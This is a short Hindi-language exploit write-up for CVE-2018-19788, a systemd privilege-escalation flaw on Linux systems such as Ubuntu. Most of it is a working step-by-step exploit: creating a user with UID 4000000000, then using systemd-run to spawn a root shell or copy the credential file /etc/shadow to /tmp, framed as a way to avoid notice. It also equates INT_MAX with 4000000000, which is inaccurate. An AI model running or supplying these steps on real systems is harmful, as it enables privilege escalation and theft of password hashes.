
CVE-2018-19788 का बिना रूट शेल के लाभ उठाना
CVE-2018-19788 एक समस्या है जहां INT_MAX (यानी 4000000000) से अधिक UID वाला कोई भी उपयोगकर्ता सिस्टमड लिनक्स बॉक्स, जैसे Ubuntu, पर कोई भी systemctl कमांड चला सकता है। (रूट शेल प्राप्त करने के लिए एक लेख पहले से मौजूद है: यहाँ). इस लेख और पूर्ण रूट शेल लेख के बीच मुख्य अंतर यह है कि यह रूट उपयोगकर्ता के बजाय स्वयं उपयोगकर्ता के रूप में चलाया जाएगा (मूल रूप से सिर्फ एक PoC है, ईमानदारी से)
रूट शेल प्राप्त करना उतना ही सरल है जितना systemd-run -t /bin/bash चलाना, लेकिन यदि आप नज़रों से बचना चाहते हैं तो आप टर्मिनल के बिना विशेषाधिकार प्राप्त फ़ाइलें प्राप्त करने के लिए सरल कमांड चला सकते हैं। इसे करने के लिए इन चरणों का पालन करें:
adduser --uid 4000000000 someusername
su someusername
systemd-run bash -c 'cat /etc/shadow > /tmp/results_poc.txt'
/tmp में है:
cat /tmp/results_poc.txt